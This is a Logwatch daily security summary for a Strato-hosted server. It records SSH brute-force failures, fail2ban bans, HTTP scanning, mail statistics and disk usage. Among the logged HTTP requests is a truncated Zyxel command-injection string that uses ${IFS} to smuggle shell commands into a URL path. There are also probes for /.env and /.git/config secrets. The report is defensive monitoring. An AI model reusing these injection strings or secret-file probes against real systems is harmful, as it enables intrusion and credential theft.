################### Logwatch 7.4.0 (03/01/11) #################### Processing Initiated: Wed Mar 27 04:42:03 2024 Date Range Processed: yesterday ( 2024-Mar-26 ) Period is day. Detail Level of Output: 0 Type of Output/Format: mail / text Logfiles for Host: h2361197.stratoserver.net ################################################################## --------------------- fail2ban-messages Begin ------------------------ Banned services with Fail2Ban: Bans:Unbans ssh: [150:151] ---------------------- fail2ban-messages End ------------------------- --------------------- httpd Begin ------------------------ Connection attempts using mod_proxy: 87.121.69.52 -> google.com:443: 4 Time(s) A total of 13 sites probed the server 123.58.213.118 161.35.230.183 165.232.108.244 174.138.61.44 188.166.87.67 192.241.231.48 198.199.97.58 198.235.24.9 205.210.31.239 216.218.206.66 45.95.169.184 66.240.192.138 66.240.205.34 Requests with error response codes 400 Bad Request null: 19 Time(s) /: 4 Time(s) google.com:443: 4 Time(s) *: 3 Time(s) +\xD8\x1F\xFC}\xC1n@,\x97\xCC1\x10R\xB1\xE ... F\x0F\xF4\xFAj]: 1 Time(s) /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${I ... }zyxel.selfrep;: 1 Time(s) /index.htm: 1 Time(s) 12.1.2: 1 Time(s) 7: 1 Time(s) \x00\x00BBBB\xBA\x8C\xC1\xABDAAA: 1 Time(s) \xC0/\xC00\xC0+\xC0,\xCC\xA8\xCC\xA9\xC0\x ... x09\xC0\x14\xC0: 1 Time(s) \xC7p\xBC$\xAE\xFA\x8E\xBE\xDD\xD3\x19\xFE ... 92\xC70\xC1\x22: 1 Time(s) \xE4g-\xB2\xBA@\xA2H6\x89\x89\x12\xA7\x9A\ ... x09\xC0\x13\xC0: 1 Time(s) \xFD\xE0\xFAD\x94\x1FC\xBE\x98$\x7F\xE4y\x96\xF0\xB6\xD6: 1 Time(s) ]\x8DT\xAF\x8F\xA3^\x7F\x1E\xD2\xD8\xED\xE ... x09\xC0\x13\xC0: 1 Time(s) mstshash=Administr: 1 Time(s) 500 Internal Server Error /: 19 Time(s) /.env: 2 Time(s) /favicon.ico: 2 Time(s) /.git/config: 1 Time(s) /.well-known/security.txt: 1 Time(s) /?XDEBUG_SESSION_START=phpstorm: 1 Time(s) /HNAP1/: 1 Time(s) /ab2g: 1 Time(s) /ab2h: 1 Time(s) /actuator/gateway/routes: 1 Time(s) /actuator/health: 1 Time(s) /alive.php: 1 Time(s) /client/get_targets: 1 Time(s) /geoserver/web/: 1 Time(s) /robots.txt: 1 Time(s) /sitemap.xml: 1 Time(s) /t4: 1 Time(s) /teorema505?t=1: 1 Time(s) /version: 1 Time(s) /webui/: 1 Time(s) 502 Bad Gateway /%7CHackMD/pdf: 1 Time(s) ---------------------- httpd End ------------------------- --------------------- pam_unix Begin ------------------------ sshd: Authentication Failures: root (89.218.49.34): 269 Time(s) root (218.92.0.53): 66 Time(s) root (218.92.0.45): 58 Time(s) root (183.81.169.238): 54 Time(s) root (218.92.0.33): 54 Time(s) root (103.36.84.194): 48 Time(s) root (218.92.0.55): 48 Time(s) root (218.92.0.40): 42 Time(s) root (218.92.0.43): 36 Time(s) root (179.43.180.106): 35 Time(s) root (218.92.0.51): 34 Time(s) root (218.92.0.47): 30 Time(s) root (218.92.0.52): 30 Time(s) root (218.92.0.59): 18 Time(s) root (218.92.0.28): 17 Time(s) root (113.106.88.146): 12 Time(s) root (201.48.108.11): 12 Time(s) unknown (212.70.149.150): 12 Time(s) root (212.70.149.150): 8 Time(s) unknown (167.172.230.140): 7 Time(s) root (121.183.30.17): 6 Time(s) root (158.51.96.38): 6 Time(s) unknown (185.11.61.88): 6 Time(s) unknown (62.122.184.252): 6 Time(s) root (121.129.194.210): 5 Time(s) root (194.169.175.35): 5 Time(s) root (85.209.11.27): 5 Time(s) unknown (141.98.11.179): 5 Time(s) unknown (194.169.175.35): 5 Time(s) unknown (85.209.11.254): 5 Time(s) root (101.33.73.147): 4 Time(s) root (141.98.11.179): 4 Time(s) unknown (185.224.128.34): 4 Time(s) unknown (85.209.11.27): 4 Time(s) unknown (194.169.175.36): 3 Time(s) root (171.217.93.19): 2 Time(s) root (d27-96-67-167.evv.wideopenwest.com): 2 Time(s) unknown (31.184.198.71): 2 Time(s) unknown (c-174-168-153-220.hsd1.ma.comcast.net): 2 Time(s) unknown (fixed-186-96-145-241.totalplay.net): 2 Time(s) mysql (141.98.11.179): 1 Time(s) root (31.184.198.71): 1 Time(s) root (85.209.11.254): 1 Time(s) sshd (194.169.175.35): 1 Time(s) sshd (194.169.175.36): 1 Time(s) unknown (101.33.73.147): 1 Time(s) unknown (175.203.118.149): 1 Time(s) unknown (183.105.173.232): 1 Time(s) unknown (185.196.8.151): 1 Time(s) Invalid Users: Unknown Account: 74 Time(s) ---------------------- pam_unix End ------------------------- --------------------- Postfix Begin ------------------------ 21.364K Bytes accepted 21,877 21.364K Bytes sent via SMTP 21,877 ======== ================================================== 1 Accepted 100.00% -------- -------------------------------------------------- 1 Total 100.00% ======== ================================================== 5 4xx Reject relay denied 100.00% -------- -------------------------------------------------- 5 Total 4xx Rejects 100.00% ======== ================================================== 38 Connections 22 Connections lost (inbound) 38 Disconnections 1 Removed from queue 1 Sent via SMTP 3 Timeouts (inbound) 5 SMTP dialog errors 2 Hostname verification errors (FCRDNS) ---------------------- Postfix End ------------------------- --------------------- sendmail-largeboxes (large mail spool files) Begin ------------------------ Large Mailbox threshold: 40MB (41943040 bytes) Warning: Large mailbox: mailman.gz (1747199807) Warning: Large mailbox: mailman (235703599967) ---------------------- sendmail-largeboxes (large mail spool files) End ------------------------- --------------------- SSHD Begin ------------------------ Disconnecting after too many authentication failures for user: root : 75 Time(s) Failed logins from: 31.184.198.71: 1 time 85.209.11.27: 5 times 85.209.11.254: 1 time 89.218.49.34 (mx12.vertex.kz): 269 times 96.27.167.67 (d27-96-67-167.evv.wideopenwest.com): 2 times 101.33.73.147: 4 times 103.36.84.194: 48 times 113.106.88.146: 12 times 121.129.194.210: 6 times 121.183.30.17: 6 times 141.98.11.179 (srv-141-98-11-179.serveroffer.net): 5 times 158.51.96.38 (unknown.ip-xfer.net): 6 times 171.217.93.19: 2 times 179.43.180.106 (hostedby.privatelayer.com): 35 times 183.81.169.238: 54 times 194.169.175.35: 6 times 194.169.175.36: 1 time 201.48.108.11 (201-048-108-011.static.ctbc.com.br): 12 times 212.70.149.150: 8 times 218.92.0.28: 17 times 218.92.0.33: 54 times 218.92.0.40: 42 times 218.92.0.43: 36 times 218.92.0.45: 58 times 218.92.0.47: 30 times 218.92.0.51: 34 times 218.92.0.52: 30 times 218.92.0.53: 66 times 218.92.0.55: 48 times 218.92.0.59: 18 times Illegal users from: 2001:470:1:c84::28 (scan-18o.shadowserver.org): 1 time undef: 43 times 31.184.198.71: 3 times 62.122.184.252: 6 times 65.49.1.78 (scan-56m.shadowserver.org): 1 time 85.209.11.27: 4 times 85.209.11.254: 5 times 89.218.49.34 (mx12.vertex.kz): 16 times 101.33.73.147: 1 time 141.98.11.179 (srv-141-98-11-179.serveroffer.net): 5 times 167.172.230.140: 7 times 174.168.153.220 (c-174-168-153-220.hsd1.ma.comcast.net): 2 times 175.203.118.149: 5 times 183.105.173.232: 5 times 185.11.61.88: 6 times 185.196.8.151: 1 time 185.224.128.34: 4 times 186.96.145.241 (fixed-186-96-145-241.totalplay.net): 2 times 194.169.175.35: 5 times 194.169.175.36: 3 times 212.70.149.150: 13 times **Unmatched Entries** Disconnecting: Protocol error: expected packet type 21, got 20 [preauth] : 1 time(s) error: buffer_get_string_ret: incomplete message [preauth] : 1 time(s) Disconnecting: Change of username or service not allowed: (root,ssh-connection) -> (test,ssh-connection) [preauth] : 1 time(s) Disconnecting: Change of username or service not allowed: (0,ssh-connection) -> (root,ssh-connection) [preauth] : 1 time(s) fatal: buffer_get_string: buffer error [preauth] : 1 time(s) Disconnecting: Change of username or service not allowed: (admin,ssh-connection) -> (ubnt,ssh-connection) [preauth] : 1 time(s) Disconnecting: Change of username or service not allowed: (root,ssh-connection) -> (admin,ssh-connection) [preauth] : 1 time(s) ---------------------- SSHD End ------------------------- --------------------- Disk Space Begin ------------------------ Filesystem Size Used Avail Use% Mounted on /dev/ploop19598p1 394G 243G 132G 65% / none 4.0G 0 4.0G 0% /dev ---------------------- Disk Space End ------------------------- ###################### Logwatch End #########################